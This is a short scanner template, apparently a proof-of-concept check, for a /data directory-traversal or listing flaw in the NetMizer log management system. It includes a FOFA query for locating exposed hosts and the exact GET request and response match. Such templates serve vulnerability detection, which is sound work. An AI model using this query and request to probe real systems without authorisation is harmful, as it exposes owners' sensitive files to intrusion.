漏洞描述
北京灵州网络技术有限公司NetMizer日志管理系统存在目录遍历漏洞,由于 /data 控制不严格,攻击者可利用该漏洞获取敏感信息。
fofa: title="NetMizer 日志管理系统"
id: netmizer-log-management-data-directory-traversal
info:
name: NetMizer 日志管理系统 data 目录遍历漏洞
author: zan8in
severity: medium
description: |-
北京灵州网络技术有限公司NetMizer日志管理系统存在目录遍历漏洞,由于 /data 控制不严格,攻击者可利用该漏洞获取敏感信息。
fofa: title="NetMizer 日志管理系统"
tags: netmizer,traversal
created: 2025/03/19
rules:
r0:
request:
method: GET
path: /data
expression: response.status == 200 && response.body.bcontains(b'Index of /data') && response.body.bcontains(b'Parent Directory')
expression: r0()